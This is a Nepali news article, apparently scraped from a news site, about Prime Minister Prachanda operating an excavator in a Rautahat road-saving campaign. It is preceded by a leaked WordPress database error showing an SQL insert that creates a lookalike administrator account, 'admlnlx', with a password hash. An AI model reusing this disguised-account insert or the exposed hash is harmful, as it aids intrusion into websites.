WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV1xUxeYzADr.oHHXZd1tsV7DYi37W.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 06:35:06', '', 'admlnlx', 'admlnlx')
रौतहट,फागुन १-
शनिबार रौतहट पुगेका प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ले आफै इस्काभेटर चलाएर सडक बचाउ अभियानमा सहभागी भएका छन् ।
प्रधानमन्त्री प्रचण्डले आफै इस्काभेटर चलाएर सडक बिस्तार र संरक्षणमा सहभागी भएका हुन् ।कार्यक्रममा प्रधानमन्त्रीले सडक बचाउ अभियानले राष्ट्रिय विकासमा महत्वपूर्ण अर्थ राख्ने बताए ।
माओवादी नेता तथा रौतहट क्षेत्र नं.–३ का निर्वाचन सांसद प्रभू शाहले २ वर्षयता चलाउँदै आएको सडक बचाउ अभियानमा प्रचण्ड सहभागि हुन पुगेका हुन् ।
इस्काभेटर चलाएर सडक बचाउ अभियानमा सहभागी भएका प्रचण्डले भने, ‘रौतहटमा बाटो बचाउने र बाटो बनाउने अभियान २ वर्षदेखि चलिरहेको छ । यसका लागि सांसद प्रभू शाह र तपाई जनसमुदायलाई धन्यवाद दिन चाहन्छु । बाटो बचाउने अभियानमा आफू पनि सरिक हुन पाएकोमा गौरवान्वित छु ।’